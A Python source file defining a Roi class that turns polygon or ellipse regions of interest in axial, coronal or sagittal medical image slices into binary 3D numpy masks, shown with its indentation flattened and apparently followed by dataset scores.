import matplotlib.patches
class Roi():
"""A class to represent a ROI
"""
def __init__(self, axis:int, first_slice:int, last_slice:int, roi_number:int, type_number:int, list_point:list, volume_dimension:tuple):
"""constructor
Args:
axis (int): [1 for axial, 2 for coronal, 3 for saggital]
first_slice (int): [slice number where ROI begin]
last_slice (int): [slice number where ROI end]
roi_number (int): [roi number]
type_number (int): [0 for nifti, 1 for axial polygone, 11 for axial ellipse, 2 for coronal polygone, 12 for coronal ellipse, 3 for saggital polygone, 13 for saggital ellipse]
list_point (list): [list of [x,y] coordonates of polygone or ellipse / list of [x,y,z] coordonates of nifti]
volume_dimension (tuple): [(shape x, shape y, shape z)]
"""
self.axis = axis
self.first_slice = first_slice
self.last_slice = last_slice
self.roi_number = roi_number
self.type_number = type_number
self.list_point = list_point
self.list_point_np = np.asarray(self.list_point)
self.x = volume_dimension[0]
self.y = volume_dimension[1]
self.z = volume_dimension[2]
def __get_min_max_of_roi(self) -> tuple:
"""Compute extrema of ROI in which we will loop to find included voxel
Arguments:
point_list {np.ndarray} -- numpy point list
Returns:
[tuple] -- X/Y extremas
"""
points_array = self.list_point_np
all_x = points_array[:][:,0]
all_y = points_array[:][:,1]
if (self.type_number == 1 or self.type_number == 2 or self.type_number == 3) : #POLYGONE
xmin = min(all_x)
xmax = max(all_x)
ymin = min(all_y)
ymax = max(all_y)
return xmin , xmax , ymin , ymax
else : #ELLIPSE
height = abs(all_x[0] - all_x[1])
width = abs(all_y[0] - all_y[2])
xmin = all_x[0] - height
xmax = all_x[0] + height
ymin = all_y[0] - width
ymax = all_y[0] + width
return xmin , xmax , ymin, ymax
def mask_roi_in_slice(self, patch:matplotlib.patches) -> list:
"""get ROI x and y limits in which we will loop, to gather [x,y] pixel which are in the patch
Args:
patch (matplotlib.patches): [polygon or ellipse]]
Returns:
[list]: [list of [x,y] coordonates]
"""
points = []
xmin, xmax, ymin, ymax = self.__get_min_max_of_roi()
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1) :
if patch.contains_point([x,y], radius = -1e-9) :
points.append([x,y])
return points
def get_empty_np_array(self) -> np.ndarray:
"""Return numpy array to fill given the current dimension and axis
Returns:
[np.ndarray] -- zero filled numpy array
"""
return (np.zeros((self.x, self.y, self.z)))
def coronal_to_axial(self, np_array_3D:np.ndarray) -> np.ndarray:
"""transform coronal 3d ndarray to 3d axial ndarray
Args:
np_array_3D (np.ndarray): [ROI ndarray]]
Returns:
[np.ndarray]: [return axial ndarray]
"""
return np.transpose(np_array_3D, (2,1,0))
def sagittal_to_axial(self, np_array_3D:np.ndarray) -> np.ndarray:
"""transform saggital 3d ndarray to 3d axial ndarray
Args:
np_array_3D (np.ndarray): [ROI ndarray]]
Returns:
[np.ndarray]: [return axial ndarray]
"""
return np.transpose(np_array_3D, (0,2,1))
def get_mask(self, list_points:list) -> np.ndarray : #list_points = [[x,y,z], [x,y,z], ...]
"""generate an empty ndarray and fill up with ROI coordonates
Args:
list_points (list): [ [[x,y,z], [x,y,z], [x,y,z], ...] ]
Returns:
[np.ndarray]: [return binary ndarray of the ROI]
"""
np_array_3D = self.get_empty_np_array()
for point in list_points:
np_array_3D[point[1], point[0] , point[2]] = 1
return np_array_3D.astype(np.uint8)
| 2.921875 | 3 |